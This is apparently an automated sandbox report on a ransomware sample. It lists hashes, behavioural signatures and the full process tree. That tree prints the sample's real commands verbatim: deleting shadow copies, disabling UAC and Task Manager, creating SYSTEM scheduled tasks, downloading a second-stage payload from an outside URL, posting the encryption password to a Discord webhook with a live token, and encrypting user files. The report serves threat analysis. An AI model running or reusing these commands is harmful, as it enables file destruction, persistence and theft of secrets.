Analysis
- max time kernel: 125s
- max time network: 94s
- platform: windows7_x64
- resource: win7v20201028
- submitted: 18-02-2021 08:52
Static task
- static1
Behavioral task
- behavioral1
- Sample: RenderGraphics.bin.exe
- Resource: win7v20201028
Behavioral task
- behavioral2
- Sample: RenderGraphics.bin.exe
- Resource: win10v20201028
General
- Target: RenderGraphics.bin.exe
- Size: 1006KB
- MD5: 46a1769d81d7dcda455f0f05b9b29648
- SHA1: 4d56dffea9d04ee8ed174f1b3328675daf4be7b1
- SHA256: 9e4f1334d3712298cb3d18e38cd954c893c890d09ad457683c8d7956a9bdb635
- SHA512: 8c8ed91b996f84807be1337fe770db4eadd0a7da00fe0545f6de86bd577054dc9a3df22cd81e25ffb4f1ea3e7642409ff9e01a57c582abb099719b069c9fc193
Malware Config
Extracted
https://cdn-35.anonfiles.com/9821W1G5p3/8a0b1f8a-1613613819/gameover.exe
Signatures
-
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Blocklisted process makes network request 2 IoCs
Processes:
flow | pid | process
9 | 1036 | powershell.exe
11 | 1668 | powershell.exe
-
Disables Task Manager via registry modification
-
Executes dropped EXE 64 IoCs
-
Modifies extensions of user files 24 IoCs
Ransomware generally changes the extension on encrypted files.
Processes:
description | ioc | process
File created | C:\Users\Admin\Pictures\WatchHide.tif.lck | aescrypt.exe
File created | C:\Users\Admin\Pictures\ReadRegister.tiff.lck | aescrypt.exe
File opened for modification | C:\Users\Admin\Pictures\ReadRegister.tiff.lck | attrib.exe
File created | C:\Users\Admin\Pictures\GrantFind.png.lck | aescrypt.exe
File created | C:\Users\Admin\Pictures\RepairSearch.crw.lck | aescrypt.exe
File opened for modification | C:\Users\Admin\Pictures\RepairSearch.crw.lck | attrib.exe
File opened for modification | C:\Users\Admin\Pictures\GetFind.png.lck | attrib.exe
File opened for modification | C:\Users\Admin\Pictures\TraceStop.raw.lck | attrib.exe
File opened for modification | C:\Users\Admin\Pictures\WatchHide.tif.lck | attrib.exe
File opened for modification | C:\Users\Admin\Pictures\SwitchRestart.tif.lck | attrib.exe
File created | C:\Users\Admin\Pictures\OutInitialize.crw.lck | aescrypt.exe
File created | C:\Users\Admin\Pictures\RenameTest.raw.lck | aescrypt.exe
File opened for modification | C:\Users\Admin\Pictures\SyncOpen.png.lck | attrib.exe
File created | C:\Users\Admin\Pictures\SwitchRestart.tif.lck | aescrypt.exe
File created | C:\Users\Admin\Pictures\ResumeSync.crw.lck | aescrypt.exe
File opened for modification | C:\Users\Admin\Pictures\ResumeSync.crw.lck | attrib.exe
File created | C:\Users\Admin\Pictures\GetFind.png.lck | aescrypt.exe
File opened for modification | C:\Users\Admin\Pictures\RenameTest.raw.lck | attrib.exe
File created | C:\Users\Admin\Pictures\SyncOpen.png.lck | aescrypt.exe
File created | C:\Users\Admin\Pictures\TraceStop.raw.lck | aescrypt.exe
File opened for modification | C:\Users\Admin\Pictures\OutInitialize.crw.lck | attrib.exe
File created | C:\Users\Admin\Pictures\InitializeConvert.tiff.lck | aescrypt.exe
File opened for modification | C:\Users\Admin\Pictures\InitializeConvert.tiff.lck | attrib.exe
File opened for modification | C:\Users\Admin\Pictures\GrantFind.png.lck | attrib.exe
-
Processes:
resource | yara_rule
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\50B0.tmp\extd.exe | upx
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\50B0.tmp\extd.exe | upx
-
Drops startup file 2 IoCs
Processes:
description | ioc | process
File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\RenderGraphics.bin.exe | cmd.exe
File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\RenderGraphics.bin.exe | cmd.exe
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
Processes:
pid | process
684 | vssadmin.exe
-
Kills process with taskkill 4 IoCs
Processes:
pid | process
2016 | taskkill.exe
560 | taskkill.exe
680 | taskkill.exe
1732 | taskkill.exe
-
Modifies Control Panel 2 IoCs
Processes:
description | ioc | process
Set value (str) | \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Control Panel\Mouse\SwapMouseButtons = "1" | reg.exe
Key created | \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Control Panel\Mouse | reg.exe
-
Modifies registry class 2 IoCs
Processes:
description | ioc | process
Key created | \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000_Classes\Local Settings | rundll32.exe
Key created | \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\MuiCache | rundll32.exe
-
Opens file in notepad (likely ransom note) 4 IoCs
Processes:
pid | process
560 | NOTEPAD.EXE
820 | NOTEPAD.EXE
1632 | NOTEPAD.EXE
224 | NOTEPAD.EXE
-
Script User-Agent 2 IoCs
Uses user-agent string associated with script host/environment.
Processes:
description | flow | ioc
HTTP User-Agent header | 5 | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header | 25 | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
-
Suspicious behavior: CmdExeWriteProcessMemorySpam 64 IoCs
-
Suspicious behavior: EnumeratesProcesses 22 IoCs
-
Suspicious use of AdjustPrivilegeToken 62 IoCs
-
Suspicious use of FindShellTrayWindow 8 IoCs
Processes:
pid | process
1448 | DiscordSendWebhook.exe
1448 | DiscordSendWebhook.exe
1448 | DiscordSendWebhook.exe
1448 | DiscordSendWebhook.exe
224 | DiscordSendWebhook.exe
224 | DiscordSendWebhook.exe
224 | DiscordSendWebhook.exe
1100 | 7zG.exe
-
Suspicious use of SendNotifyMessage 7 IoCs
Processes:
pid | process
1448 | DiscordSendWebhook.exe
1448 | DiscordSendWebhook.exe
1448 | DiscordSendWebhook.exe
1448 | DiscordSendWebhook.exe
224 | DiscordSendWebhook.exe
224 | DiscordSendWebhook.exe
224 | DiscordSendWebhook.exe
-
Suspicious use of WriteProcessMemory 64 IoCs
-
Views/modifies file attributes 1 TTPs 64 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\RenderGraphics.bin.exe
"C:\Users\Admin\AppData\Local\Temp\RenderGraphics.bin.exe"
Depth: 1
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\50AF.tmp\50B0.tmp\50C1.bat C:\Users\Admin\AppData\Local\Temp\RenderGraphics.bin.exe"
Depth: 2
- Drops startup file
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\Wbem\WMIC.exe
wmic shadowcopy delete
Depth: 3
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\vssadmin.exe
vssadmin delete shadows /all /quiet
Depth: 3
- Interacts with shadow copies
-
C:\Windows\system32\reg.exe
REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "PromptOnSecureDesktop" /t REG_DWORD /d "0" /f
Depth: 3
-
C:\Windows\system32\reg.exe
REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "ConsentPromptBehaviorAdmin" /t REG_DWORD /d "0" /f
Depth: 3
-
C:\Windows\system32\reg.exe
REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableLUA" /t REG_DWORD /d "1" /f
Depth: 3
-
C:\Windows\system32\reg.exe
REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Keyboard Layout" /v "Scancode Map" /t REG_BINARY /d "00000000000000001700000000003800000038e000005be000005ce00000360000001d0000001de000000f000000010000001c0000003e0000003b00000044000000450000003d0000005de000000000" /f /reg:64
Depth: 3
-
C:\Windows\system32\reg.exe
REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f
Depth: 3
-
C:\Windows\system32\reg.exe
REG ADD "HKCU\Control Panel\Mouse" /v SwapMouseButtons /t REG_SZ /d "1" /f
Depth: 3
- Modifies Control Panel
-
C:\Windows\system32\attrib.exe
attrib +r +s +h C:\Users\Admin\AppData\Local\Temp\RenderGraphics.bin.exe
Depth: 3
-
C:\Windows\system32\attrib.exe
attrib +r +s +h "C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"
Depth: 3
- Views/modifies file attributes
-
C:\Windows\system32\attrib.exe
attrib +r +s +h "C:\Users\Admin\AppData\Local\Temp\50AF.tmp\DiscordSendWebhook.exe"
Depth: 3
- Views/modifies file attributes
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\DiscordSendWebhook.exe
"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\DiscordSendWebhook" -m ":writing_hand: LEAKGAP: Crypting Files..." -w https://discord.com/api/webhooks/807704589436452915/jhcjthfZ4SBzzZNBbqZ9xII5kv9CycOOacxLmktf6BQQn-FYteG1I-Ntg02B-4UphE4K
Depth: 3
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell start -verb runas cmd.exe -ArgumentList "/c kill.bat" -filepath "C:\Users\Admin\AppData\Local\Temp" -WindowStyle hidden
Depth: 3
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\taskkill.exe
taskkill /f /im opera.exe
Depth: 3
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\taskkill.exe
taskkill /f /im chrome.exe
Depth: 3
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\taskkill.exe
taskkill /f /im firefox.exe
Depth: 3
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\taskkill.exe
taskkill /f /im iexplore.exe
Depth: 3
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\schtasks.exe
schtasks /create /sc onlogon /tn UpdateWuauclt /rl highest /tr "C:\Users\Admin\AppData\Local\Temp\RenderGraphics.bin.exe" /RU "SYSTEM" /f
Depth: 3
- Creates scheduled task(s)
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -c (new-object System.Net.WebClient).DownloadFile('https://cdn-35.anonfiles.com/9821W1G5p3/8a0b1f8a-1613613819/gameover.exe','C:\Users\Admin\AppData\Local\Temp\final.exe')
Depth: 3
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -c Invoke-WebRequest -Uri https://cdn-35.anonfiles.com/9821W1G5p3/8a0b1f8a-1613613819/gameover.exe -OutFile C:\Users\Admin\AppData\Local\Temp\final.exe
Depth: 3
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\certutil.exe
certutil -urlcache -split -f https://cdn-35.anonfiles.com/9821W1G5p3/8a0b1f8a-1613613819/gameover.exe C:\Users\Admin\AppData\Local\Temp\final.exe
Depth: 3
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\50B0.tmp\extd.exe
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\50B0.tmp\extd.exe "/download" "https://cdn-35.anonfiles.com/9821W1G5p3/8a0b1f8a-1613613819/gameover.exe" "C:\Users\Admin\AppData\Local\Temp\final.exe" "" "" "" "" "" ""
Depth: 3
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
-
C:\Windows\system32\schtasks.exe
schtasks /create /sc DAILY /tn UpdateWuaucltHelper /rl highest /tr "C:\Users\Admin\AppData\Local\Temp\final.exe" /RU "SYSTEM" /MO 5
Depth: 3
- Creates scheduled task(s)
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\DiscordSendWebhook.exe
"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\DiscordSendWebhook" -m ":satellite: LEAKGAP: Info from Admin, Password: kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh, FakeAccount: BUqT8JXD7pI90Dz17V9SNhEUk8qVQ8khPH2rP, PersonalKey:||RSLgNRKl0oUE979LWZaRUh4MpMfNOD6SN4l0sOa||" -w https://discord.com/api/webhooks/807704589436452915/jhcjthfZ4SBzzZNBbqZ9xII5kv9CycOOacxLmktf6BQQn-FYteG1I-Ntg02B-4UphE4K
Depth: 3
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell start-process -verb runas -FilePath "C:\Users\Admin\AppData\Local\Temp\final.exe" -WindowStyle hidden
Depth: 3
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\attrib.exe
attrib +r +s +h C:\Users\Admin\AppData\Local\Temp /s /D
Depth: 3
-
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c dir * /a-D /b /oS
Depth: 3
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe
"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "desktop.ini.lck" "desktop.ini"
Depth: 3
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
-
C:\Windows\system32\attrib.exe
attrib +r "desktop.ini.lck"
Depth: 3
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe
"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "ReadRequest.midi.lck" "ReadRequest.midi"
Depth: 3
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
-
C:\Windows\system32\attrib.exe
attrib +r "ReadRequest.midi.lck"
Depth: 3
- Views/modifies file attributes
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe
"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "WatchStop.ps1.lck" "WatchStop.ps1"
Depth: 3
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
-
C:\Windows\system32\attrib.exe
attrib +r "WatchStop.ps1.lck"
Depth: 3
- Views/modifies file attributes
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe
"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "ConvertFind.mpg.lck" "ConvertFind.mpg"
Depth: 3
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
-
C:\Windows\system32\attrib.exe
attrib +r "ConvertFind.mpg.lck"
Depth: 3
- Views/modifies file attributes
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe
"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "RepairBackup.dib.lck" "RepairBackup.dib"
Depth: 3
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
-
C:\Windows\system32\attrib.exe
attrib +r "RepairBackup.dib.lck"
Depth: 3
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe
"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "CompressSuspend.MOD.lck" "CompressSuspend.MOD"
Depth: 3
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
-
C:\Windows\system32\attrib.exe
attrib +r "CompressSuspend.MOD.lck"
Depth: 3
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe
"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "HideRepair.vsdx.lck" "HideRepair.vsdx"
Depth: 3
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
-
C:\Windows\system32\attrib.exe
attrib +r "HideRepair.vsdx.lck"
Depth: 3
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe
"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "UndoPush.cab.lck" "UndoPush.cab"
Depth: 3
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
-
C:\Windows\system32\attrib.exe
attrib +r "UndoPush.cab.lck"
Depth: 3
- Views/modifies file attributes
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe
"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "MountLock.mpp.lck" "MountLock.mpp"
Depth: 3
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
-
C:\Windows\system32\attrib.exe
attrib +r "MountLock.mpp.lck"
Depth: 3
- Views/modifies file attributes
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe
"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "ReceiveConnect.M2T.lck" "ReceiveConnect.M2T"
Depth: 3
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
-
C:\Windows\system32\attrib.exe
attrib +r "ReceiveConnect.M2T.lck"
Depth: 3
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe
"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "BlockEnter.xps.lck" "BlockEnter.xps"
Depth: 3
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
-
C:\Windows\system32\attrib.exe
attrib +r "BlockEnter.xps.lck"
Depth: 3
- Views/modifies file attributes
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe
"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "DismountMeasure.css.lck" "DismountMeasure.css"
Depth: 3
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
-
C:\Windows\system32\attrib.exe
attrib +r "DismountMeasure.css.lck"
Depth: 3
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe
"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "ReadRedo.vbe.lck" "ReadRedo.vbe"
Depth: 3
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
-
C:\Windows\system32\attrib.exe
attrib +r "ReadRedo.vbe.lck"
Depth: 3
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe
"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "EditDebug.fon.lck" "EditDebug.fon"
Depth: 3
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
-
C:\Windows\system32\attrib.exe
attrib +r "EditDebug.fon.lck"
Depth: 3
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe
"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "ClearExit.cfg.lck" "ClearExit.cfg"
Depth: 3
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
-
C:\Windows\system32\attrib.exe
attrib +r "ClearExit.cfg.lck"
Depth: 3
- Views/modifies file attributes
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe
"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "StopSelect.dotx.lck" "StopSelect.dotx"
Depth: 3
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
-
C:\Windows\system32\attrib.exe
attrib +r "StopSelect.dotx.lck"
Depth: 3
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe
"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "StartInitialize.png.lck" "StartInitialize.png"
Depth: 3
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
-
C:\Windows\system32\attrib.exe
attrib +r "StartInitialize.png.lck"
Depth: 3
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe
"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "ShowSearch.gif.lck" "ShowSearch.gif"
Depth: 3
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
-
C:\Windows\system32\attrib.exe
attrib +r "ShowSearch.gif.lck"
Depth: 3
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe
"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "ConnectMove.emf.lck" "ConnectMove.emf"
Depth: 3
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
-
C:\Windows\system32\attrib.exe
attrib +r "ConnectMove.emf.lck"
Depth: 3
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe
"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "BackupExit.gif.lck" "BackupExit.gif"
Depth: 3
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
-
C:\Windows\system32\attrib.exe
attrib +r "BackupExit.gif.lck"
Depth: 3
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe
"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "InstallLock.xps.lck" "InstallLock.xps"
Depth: 3
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
-
C:\Windows\system32\attrib.exe
attrib +r "InstallLock.xps.lck"
Depth: 3
- Views/modifies file attributes
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe
"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "RestartSearch.bmp.lck" "RestartSearch.bmp"
Depth: 3
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
-
C:\Windows\system32\attrib.exe
attrib +r "RestartSearch.bmp.lck"
Depth: 3
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe
"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "UnblockSearch.svg.lck" "UnblockSearch.svg"
Depth: 3
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
-
C:\Windows\system32\attrib.exe
attrib +r "UnblockSearch.svg.lck"
Depth: 3
- Views/modifies file attributes
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe
"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "ConfirmAdd.jpeg.lck" "ConfirmAdd.jpeg"
Depth: 3
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
-
C:\Windows\system32\attrib.exe
attrib +r "ConfirmAdd.jpeg.lck"
Depth: 3
-
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c dir * /aD /b /oS
Depth: 3
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -c (new-object System.Net.WebClient).DownloadFile('','')
Depth: 3
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -c Invoke-WebRequest -Uri -OutFile3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\certutil.execertutil -urlcache -split -f3⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe start-process -FilePath "C:\Windows\System32\cmd.exe" -ArgumentList "/k","call","C:\Users\Admin\Desktop\p2d.bat" -WorkingDirectory "C:\Users\Admin\Desktop" -WindowStyle hidden3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k call C:\Users\Admin\Desktop\p2d.bat4⤵
-
C:\Windows\system32\NOTEPAD.EXE"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\Pay2Decrypt1.txt5⤵
- Opens file in notepad (likely ransom note)
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c dir * /a-D /b /oS3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "ntuser.dat.LOG2.lck" "ntuser.dat.LOG2"3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
-
C:\Windows\system32\attrib.exeattrib +r "ntuser.dat.LOG2.lck"3⤵
- Views/modifies file attributes
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "ntuser.ini.lck" "ntuser.ini"3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
-
C:\Windows\system32\attrib.exeattrib +r "ntuser.ini.lck"3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "deployment.properties.lck" "deployment.properties"3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
-
C:\Windows\system32\attrib.exeattrib +r "deployment.properties.lck"3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf.lck" "NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf"3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
-
C:\Windows\system32\attrib.exeattrib +r "NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf.lck"3⤵
- Views/modifies file attributes
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "ntuser.dat.LOG1.lck" "ntuser.dat.LOG1"3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
-
C:\Windows\system32\attrib.exeattrib +r "ntuser.dat.LOG1.lck"3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms.lck" "NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms"3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
-
